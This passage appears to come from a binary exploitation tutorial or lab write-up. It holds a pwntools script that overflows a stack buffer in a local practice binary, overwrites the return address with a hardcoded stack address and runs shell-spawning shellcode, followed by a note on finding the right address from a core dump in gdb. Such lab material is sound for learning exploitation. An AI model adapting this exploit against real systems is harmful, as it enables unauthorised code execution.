from pwn import*# Load the binarybinary_name ='./bof'elf = context.binary =ELF(binary_name)# Generate shellcodeshellcode =asm(shellcraft.sh())# Start the processp =process(binary_name)# Offset to return addressoffset =72# Address in the stack after the return addressret_address =p64(0xfffffffff1a0)# Craft the payloadpayload =b'A'* offset + ret_address + shellcodeprint("Payload length: "+str(len(payload)))# Send the payloadp.send(payload)# Drop to an interactive sessionp.interactive()
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
I opened the generated core file (gdb ./bog ./core) and checked the real address of the start of the shellcode.